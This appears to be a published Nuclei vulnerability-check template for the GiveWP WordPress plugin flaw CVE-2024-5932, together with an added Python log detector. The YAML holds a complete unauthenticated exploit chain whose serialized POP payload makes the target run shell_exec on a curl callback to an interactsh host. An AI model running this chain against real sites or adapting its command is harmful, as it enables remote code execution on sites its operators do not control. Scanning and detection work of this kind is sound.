GiveWP - PHP Object Injection
ID: CVE-2024-5932
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,rce,wp,wp-plugin,wordpress,oast,givewp
Description
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter.
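A log-side check for the input described above, as an added example that is not part of the template or of GiveWP's own code: it flags `give_process_donation` POSTs to `admin-ajax.php` whose `give_title` value contains a PHP serialized-object marker. The function names, the (path, body) record shape and the sample requests are assumptions constructed for illustration; the sample object is a harmless `stdClass`.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Marker that opens a PHP serialized object, e.g. O:8:"stdClass":0:{
# ("C:" is the custom-serializable form; the optional "+" is tolerated defensively).
SERIALIZED_OBJECT = re.compile(r'(?<![A-Za-z0-9])[OC]:\+?\d+:"[^"]+":\d+:\{')

def decode_fully(value, max_rounds=3):
    """Strip extra percent-encoding layers a log pipeline may have left in place."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_donation_post(path, body):
    """Return a finding for a donation POST whose give_title holds a serialized
    PHP object, or None. Assumed input: request path and urlencoded body."""
    if not path.split("?", 1)[0].endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(body, keep_blank_values=True)
    if "give_process_donation" not in params.get("action", []):
        return None
    for raw in params.get("give_title", []):
        match = SERIALIZED_OBJECT.search(decode_fully(raw))
        if match:
            return {"param": "give_title", "marker": match.group(0)}
    return None

# Constructed sample requests (not captured traffic); the object is a harmless stdClass.
AJAX = "/wp-admin/admin-ajax.php"
SAMPLES = [
    (AJAX, "action=give_process_donation&give_title=Mr."),
    (AJAX, "action=give_process_donation&give_title=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D"),
    (AJAX, "action=give_process_donation&give_title=O%253A8%253A%2522stdClass%2522%253A0%253A%257B%257D"),
    (AJAX, "action=heartbeat&give_title=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D"),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(inspect_donation_post(path, body))
```

A hit is a signal to check the installed plugin version against the fixed release, 3.14.2, not proof of compromise.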
YAML Source
id: CVE-2024-5932

info:
  name: GiveWP - PHP Object Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter.
  impact: |
    This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
  remediation: Fixed in 3.14.2.
  reference:
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/includes/login-register.php#L235
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/includes/process-donation.php#L420
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/src/DonorDashboards/Tabs/EditProfileTab/AvatarRoute.php#L51
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/vendor/tecnickcom/tcpdf/tcpdf.php#L7861
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/vendor/vendor-prefixed/fakerphp/faker/src/Faker/ValidGenerator.php#L80
    - https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932/
    - https://thehackernews.com/2024/08/givewp-wordpress-plugin-vulnerability.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-5932
    cwe-id: CWE-502
    epss-score: 0.00178
    epss-percentile: 0.55631
    cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: givewp
    product: givewp
    framework: wordpress
    publicwww-query: "/wp-content/plugins/give/"
  tags: cve,cve2024,rce,wp,wp-plugin,wordpress,oast,givewp

flow: http(1) && http(2) && http(3)

variables:
  oast: "{{interactsh-url}}"
  len_payload: "{{ len(oast) + 5 }}"
  payload: 'O:19:"Stripe\\\\StripeObject":1:{s:7:"_values";a:1:{i:0;O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:9:"container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:9:"generator";O:24:"Give\\\\Container\\\\Container":1:{s:9:"instances";a:1:{s:8:"address1";s:{{len_payload}}:"curl {{oast}}";}}s:10:"maxRetries";i:1;s:9:"validator";s:10:"shell_exec";}}}}}}'
  email: "{{to_lower(rand_text_alpha(8))}}@gmail.com"
  firstname: "{{to_lower(rand_text_alpha(5))}}"
  lastname: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        GET /wp-json/wp/v2/give_forms/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '"type":'
          - '"guid":'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: value
        internal: true
        json:
          - '.[0].slug'

      - type: json
        part: body
        name: give-form-title
        internal: true
        json:
          - '.[0].title.rendered'

      - type: json
        part: body
        name: links
        internal: true
        json:
          - '.[0].link'

  - raw:
      - |
        GET /give/{{value}}?giveDonationFormInIframe=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'give-form-hash'
          - 'give-form-id-prefix'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: give-form-hash
        internal: true
        regex:
          - 'name="give\-form\-hash" value="([0-9a-z]+)"'

      - type: regex
        part: body
        group: 1
        name: give-form-id-prefix
        internal: true
        regex:
          - 'name="give\-form\-id\-prefix" value="([0-9-]+)"'

      - type: regex
        part: body
        group: 1
        name: give-form-id
        internal: true
        regex:
          - 'name="give\-form\-id" value="([0-9]+)"'

      - type: regex
        part: body
        group: 1
        name: give-amount
        internal: true
        regex:
          - 'give\-form\-minimum"\n\s+value="([0-9.]+)"\/>'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        give-honeypot=&give-form-id-prefix={{give-form-id-prefix}}&give-form-id={{give-form-id}}&give-form-title={{give-form-title}}&give-current-url={{links}}&give-form-url={{RootURL}}&give-form-minimum={{give-amount}}&give-form-maximum=1000000&give-form-hash={{give-form-hash}}&give-price-id=custom&give-amount={{give-amount}}&give_first={{firstname}}&give_last={{lastname}}&give_email={{email}}&give_stripe_payment_method=&give-user-id=1&give_action=purchase&give-gateway=manual&give_embed_form=1&action=give_process_donation&&give_title={{payload}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - '"error_data"'
          - '"unknown_error"'
        condition: and
# digest: 4b0a00483046022100e7b666d26ce14bf6705b40916bb9bc752a96d887826d9a5b5bcdd51b384e80b1022100aacfdde145470ef1ee0ab33225cc5eff0f4138a22aafd405c69facf4226ce17c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-5932.yaml"